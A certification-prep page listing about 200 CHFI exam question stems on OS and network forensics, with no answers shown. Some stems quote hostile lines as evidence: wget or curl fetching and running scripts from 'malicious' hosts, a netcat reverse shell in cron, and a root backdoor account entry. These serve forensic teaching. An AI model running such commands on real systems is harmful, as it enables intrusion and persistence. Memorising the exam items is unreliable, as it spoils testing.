© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

CHFI OS and Network Forensics — All Questions With Answers

Complete CHFI OS and Network Forensics question bank — all 0 questions with answers and detailed explanations.

216 Questions
Question 1 (easy, multiple choice)

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

Question 2 (medium, multiple choice)

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

Question 3 (hard, multiple choice)

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

Question 4 (medium, multiple choice)

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

Question 5 (medium, multiple choice)

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

Question 6 (easy, multiple choice)

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

Question 7 (medium, multiple choice)

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

Question 8 (hard, multiple choice)

During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?

Question 9 (medium, multiple choice)

Which of the following Windows registry keys is commonly used by malware to achieve persistence by executing a program at user logon?

Question 10 (easy, multiple choice)

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

Question 11 (hard, multiple choice)

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

Question 12 (medium, multiple choice)

An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?

Question 13 (medium, multi select)

A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)

Question 14 (hard, multi select)

A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)

Question 15 (medium, multi select)

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Question 16 (medium, multiple choice)

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

Question 17 (hard, multiple choice)

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

Question 18 (easy, multiple choice)

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

Question 19 (medium, multiple choice)

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

Question 20 (easy, multiple choice)

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

Question 21 (hard, multiple choice)

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

Question 22 (medium, multiple choice)

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

Question 23 (easy, multiple choice)

Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?

Question 24 (medium, multiple choice)

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

Question 25 (hard, multiple choice)

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

Question 26 (medium, multiple choice)

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

Question 27 (hard, multiple choice)

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

Question 28 (medium, multi select)

Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)

Question 29 (hard, multi select)

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Question 30 (medium, multi select)

Which TWO Linux log files are MOST relevant for investigating authentication events and user login activity? (Choose TWO.)

Question 31 (medium, multiple choice)

During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?

Question 32 (easy, multiple choice)

In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?

Question 33 (hard, multiple choice)

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

Question 34 (medium, multiple choice)

A forensic examiner needs to extract timeline data from a compromised Linux system for analysis with log2timeline/Plaso. Which of the following command sequences should be used?

Question 35 (easy, multiple choice)

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

Question 36 (medium, multiple choice)

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

Question 37 (medium, multiple choice)

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

Question 38 (hard, multiple choice)

A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?

Question 39 (medium, multiple choice)

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

Question 40 (easy, multiple choice)

Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?

Question 41 (hard, multiple choice)

An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?

Question 42 (easy, multiple choice)

Which Windows Event ID is generated when a service is installed on a system?

Question 43 (medium, multi select)

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Question 44 (hard, multi select)

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Question 45 (medium, multi select)

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Question 46 (medium, multiple choice)

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

Question 47 (medium, multiple choice)

During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?

Question 48 (hard, multiple choice)

An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?

Question 49 (medium, multiple choice)

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

Question 50 (easy, multiple choice)

In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?

Question 51 (medium, multiple choice)

A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?

Question 52 (easy, multiple choice)

A security analyst needs to examine network traffic for signs of a data exfiltration attempt. Which tool is specifically designed for deep packet inspection and can reconstruct TCP streams?

Question 53 (hard, multiple choice)

During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?

Question 54 (medium, multiple choice)

A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?

Question 55 (easy, multiple choice)

In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?

Question 56 (hard, multiple choice)

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

Question 57 (medium, multiple choice)

An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?

Question 58 (medium, multi select)

A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)

Question 59 (hard, multi select)

An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)

Question 60 (easy, multi select)

A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)

Question 61 (medium, multiple choice)

A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?

Question 62 (easy, multiple choice)

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

Question 63 (hard, multiple choice)

During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by an 'Accepted password for root' entry. What is the MOST likely conclusion?

Question 64 (medium, multiple choice)

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

Question 65 (easy, multiple choice)

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

Question 66 (medium, multiple choice)

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

Question 67 (hard, multiple choice)

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

Question 68 (easy, multiple choice)

Which Windows Event ID is generated when a new service is installed on a system?

Question 69 (medium, multiple choice)

A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?

Question 70 (medium, multiple choice)

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

Question 71 (hard, multiple choice)

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

Question 72 (medium, multiple choice)

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

Question 73 (medium, multi select)

Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)

Question 74 (hard, multi select)

Which THREE of the following are indicators of a web shell on a web server? (Select three.)

Question 75 (easy, multi select)

Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)

Question 76 (easy, multiple choice)

A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?

Question 77 (medium, multiple choice)

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

Question 78 (medium, multiple choice)

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

Question 79 (hard, multiple choice)

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

Question 80 (easy, multiple choice)

In Linux forensics, which file contains information about user account passwords in hashed form?

Question 81 (medium, multiple choice)

A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?

Question 82 (hard, multiple choice)

During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?

Question 83 (medium, multiple choice)

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

Question 84 (easy, multiple choice)

Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?

Question 85 (medium, multiple choice)

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

Question 86 (hard, multiple choice)

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

Question 87 (medium, multiple choice)

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

Question 88 (medium, multi select)

Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)

Question 89 (hard, multi select)

Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)

Question 90 (medium, multi select)

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Question 91 (medium, multiple choice)

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

Question 92 (hard, multiple choice)

During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?

Question 93 (easy, multiple choice)

A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?

Question 94 (medium, multiple choice)

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

Question 95 (medium, multiple choice)

During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?

Question 96 (easy, multiple choice)

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

Question 97 (medium, multiple choice)

A forensic analyst is examining a Mac system for evidence of recent file access. Which artifact provides a timeline of file system events with high precision and is commonly analyzed using tools like mac_apt?

Question 98 (medium, multiple choice)

A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?

Question 99 (hard, multiple choice)

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

Question 100 (easy, multiple choice)

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

Question 101 (hard, multiple choice)

During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?

Question 102 (medium, multiple choice)

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

Question 103 (medium, multi select)

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Question 104 (hard, multi select)

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Question 105 (medium, multi select)

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Question 106 (medium, multiple choice)

A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?

Question 107 (hard, multiple choice)

During a forensic investigation of a Windows 10 system, an examiner finds the following registry key: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count. The values contain Rot‑13 encoded data. What is the primary purpose of this artifact?

Question 108 (medium, multiple choice)

An analyst is examining a Linux server and issues the command: cat /var/log/auth.log | grep 'Failed password' | awk '{print $1,$2,$3,$9,$11}' | sort | uniq -c. What is the analyst most likely trying to determine?

Question 109 (easy, multiple choice)

Which Windows registry hive should be examined to determine the last time a specific external USB drive was connected to a system?

Question 110 (medium, multiple choice)

A forensic analyst is investigating a macOS system and wants to review a timeline of past application launches and file accesses across multiple days. Which forensic artifact is BEST suited for this purpose?

Question 111 (hard, multiple choice)

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

Question 112 (easy, multiple choice)

Which Windows Event ID is generated when a new service is installed on a system?

Question 113 (medium, multiple choice)

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

Question 114 (hard, multiple choice)

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

Question 115 (easy, multiple choice)

In Linux, which file contains hashed user passwords?

Question 116 • medium • multiple choice

An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?

Question 117 • hard • multiple choice

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

Question 118 • medium • multi select

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Question 119 • hard • multi select

A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)

Question 120 • easy • multi select

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Question 121 • easy • multiple choice

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

Question 122 • medium • multiple choice

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

Question 123 • hard • multiple choice

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

Question 124 • medium • multiple choice

A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?

Question 125 • easy • multiple choice

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

Question 126 • medium • multiple choice

A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?

Question 127 • hard • multiple choice

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

Question 128 • medium • multiple choice

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

Question 129 • easy • multiple choice

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

Question 130 • medium • multiple choice

A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?

Question 131 • hard • multiple choice

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

Question 132 • medium • multiple choice

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

Question 133 • medium • multi select

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Question 134 • hard • multi select

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Question 135 • medium • multi select

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Question 136 • easy • multiple choice

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

Question 137 • medium • multiple choice

During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?

Question 138 • medium • multiple choice

A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?

Question 139 • hard • multiple choice

A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?

Question 140 • easy • multiple choice

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

Question 141 • medium • multiple choice

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

Question 142 • medium • multiple choice

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

Question 143 • easy • multiple choice

Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?

Question 144 • hard • multiple choice

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

Question 145 • medium • multiple choice

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

Question 146 • medium • multiple choice

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

Question 147 • hard • multiple choice

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

Question 148 • medium • multi select

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Question 149 • hard • multi select

Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)

Question 150 • easy • multi select

Which TWO of the following are primary locations for browser history artifacts in a Windows 10 system? (Select TWO.)

Question 151 • easy • multiple choice

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

Question 152 • medium • multiple choice

During a forensic investigation of a Windows system, an analyst examines the NTUSER.DAT registry hive. Which artifact would MOST likely be found to identify recently accessed documents and folders via the Windows Explorer GUI?

Question 153 • medium • multiple choice

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

Question 154 • hard • multiple choice

During a Mac forensic examination, an investigator needs to find evidence of recently executed applications and accessed files. Which artifact should the investigator prioritize for reconstructing user activity?

Question 155 • medium • multiple choice

A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?

Question 156 • easy • multiple choice

A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?

Question 157 • medium • multiple choice

A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?

Question 158 • hard • multiple choice

A forensic analyst finds an LNK file on a Windows system pointing to a script located in a temporary folder. The LNK file's timestamps show creation time after the script's known execution time. What does this discrepancy likely indicate?

Question 159 • medium • multiple choice

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

Question 160 • easy • multiple choice

In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?

Question 161 • medium • multiple choice

An investigator finds a webshell on a compromised web server. Which artifact would be MOST useful to determine what commands were executed through the webshell?

Question 162 • hard • multiple choice

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

Question 163 • medium • multi select

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Question 164 • hard • multi select

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Question 165 • medium • multi select

In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)

Question 166 • medium • multiple choice

A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by Event ID 4624 logon success. Which attack technique is MOST likely indicated?

Question 167 • hard • multiple choice

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

Question 168 • easy • multiple choice

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

Question 169 • medium • multiple choice

A Linux system administrator notices unusual outbound connections from a server. Which log file should be examined FIRST to identify authentication attempts related to the compromised account?

Question 170 • medium • multiple choice

During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. No SYN-ACK packets are returned, but the target continues to send SYN-ACK responses for earlier packets. What attack is MOST likely occurring?

Question 171 • easy • multiple choice

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

Question 172 • hard • multiple choice

A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?

Question 173 • medium • multiple choice

In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?

Question 174 • easy • multiple choice

Which Windows Event ID is generated when a new service is installed on the system?

Question 175 • medium • multiple choice

A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?

Question 176 • hard • multiple choice

During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?

Question 177 • medium • multiple choice

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

Question 178 • medium • multi select

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Question 179 • hard • multi select

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Question 180 • easy • multi select

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Question 181 • easy • multiple choice

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

Question 182 • medium • multiple choice

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

Question 183 • hard • multiple choice

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

Question 184 • easy • multiple choice

In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?

Question 185 • medium • multiple choice

A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?

Question 186 • medium • multiple choice

During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?

Question 187 • hard • multiple choice

A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?

Question 188 • easy • multiple choice

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

Question 189 • medium • multiple choice

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

Question 190 • hard • multiple choice

A forensic examiner uses Plaso (log2timeline) to create a timeline from a disk image. Which of the following artifacts would NOT be included in the timeline by default using the 'all' parser?

Question 191 • medium • multiple choice

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

Question 192 • easy • multiple choice

Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?

Question 193 • medium • multi select

A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?

Question 194 • hard • multi select

A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?

Question 195 • medium • multi select

During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?

Question 196 • medium • multiple choice

A security analyst reviewing Windows Security Event Logs sees multiple Event ID 4625 entries for a single user account, followed by a successful Event ID 4624. The account is a domain administrator. What is the MOST likely explanation?

Question 197 • hard • multiple choice

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

Question 198 • medium • multiple choice

An investigator is analyzing a Windows 10 system suspected of malware persistence. Which registry key is commonly used by malware to achieve persistence by running a program at every user logon?

Question 199 • easy • multiple choice

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

Question 200 • medium • multiple choice

